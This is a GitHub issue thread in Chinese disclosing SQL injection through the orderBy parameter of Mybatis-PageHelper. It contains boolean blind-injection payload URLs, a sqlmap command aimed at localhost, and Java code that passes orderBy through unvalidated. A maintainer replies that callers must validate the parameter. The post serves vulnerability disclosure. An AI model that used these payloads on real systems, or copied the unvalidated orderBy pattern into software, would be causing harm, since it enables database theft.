### ISSUE TITLE
PageHelper存在SQL注入漏洞

### ISSUE THREAD

**Issue by AlertMouse** [pagehelper/Mybatis-PageHelper#653]
- [x] 我已在 [issues](https://github.com/pagehelper/Mybatis-PageHelper/issues) 搜索类似问题，并且不存在相同的问题.

### 使用环境
SpringBoot+Mybatis+MySQL

* PageHelper 版本: 5.3.0（测试1.4.1也有同样的问题，推测所有版本都有该问题）
* 数据库类型和版本: MySQL [10.4.8-MariaDB]
* JDBC_URL: xxx

#### 调用PageHelper

```java
PageHelper.startPage(1, 10, [orderBy]);;
xxMapper.select(model); // select * from book

//BookMapper
@Repository
public interface BookMapper {

    @Select("select * from book")
    List<Book> queryBookList();
}
//BookService
@Service
public class BookService {
    @Autowired
    BookMapper bookMapper;

    public PageInfo<Book> findAllBookByPageS(int pageNum, int pageSize, String orderBy) {
        PageHelper.startPage(pageNum, pageSize, orderBy);
        List<Book> lists = bookMapper.queryBookList();
        PageInfo<Book> pageInfo = new PageInfo<Book>(lists);
        return pageInfo;

    }

    public List<Book> findAllBookByPageF(int pageNum, int pageSize, String orderBy) {
        PageHelper.startPage(pageNum, pageSize, orderBy);
        List<Book> lists = bookMapper.queryBookList();
        return lists;

    }

}
```

#### 验证过程（布尔型盲注）
（因本人从事的是安全测试，Java代码基础薄弱，对于源码审计一块仅能定位到大致的位置，抱歉）
1.	访问具有排序参数orderBy的页面
2.	访问url：http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=**(SELECT (CASE WHEN (_1=1_) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))**
![image](https://user-images.githubusercontent.com/87937505/160416849-edc845e0-916a-4803-8305-5de5168ef2f3.png)
 

3.	访问url：http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=**(SELECT (CASE WHEN (_1=2_) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))**
 
![image](https://user-images.githubusercontent.com/87937505/160416813-950397de-4306-4af3-8b63-7909873d6581.png)

4.	使用sqlmap进行扫描，命令：python3 sqlmap.py -u "http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=costprice*" --batch --dbms=mysql
 
![image](https://user-images.githubusercontent.com/87937505/160416886-35f924af-9b5e-4250-ac5c-b2517d7e4d1c.png)

5.	在\com\github\pagehelper\parser\OrderByParser.java的converToOrderBySql函数中，将mapper的SQL语句与pageNum、pageSize、orderBy拼接起来
 
![image](https://user-images.githubusercontent.com/87937505/160417370-5a424f8f-57a2-4d6e-851e-6d4c09066f5d.png)

6.	该函数直接将mapper的SQL语句【select * from book】与orderBy参数提交的值【 (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) 】直接拼接了在一起
 
![image](https://user-images.githubusercontent.com/87937505/160417385-5696327e-8726-4721-8d11-773d6d59f834.png)

7.	converToOrderBySql返回的值就赋给了sql，sql=SELECT * FROM book order by (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
 
![image](https://user-images.githubusercontent.com/87937505/160417404-c09673b9-d07c-4dc7-9f99-3dc40da82d38.png)

8.	在MySQL查看执行过的SQL语句历史，可以看到orderBy参数提交的参数被完整的放进了查询的SQL语句中【 SELECT * FROM book order by (SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) LIMIT 10 】

![image](https://user-images.githubusercontent.com/87937505/160417485-1869208d-7d97-425d-adb8-76ada902f93d.png)

**Comment by abel533** [comment]
order by会被注入，如果使用传入的参数，需要自己做好校验。
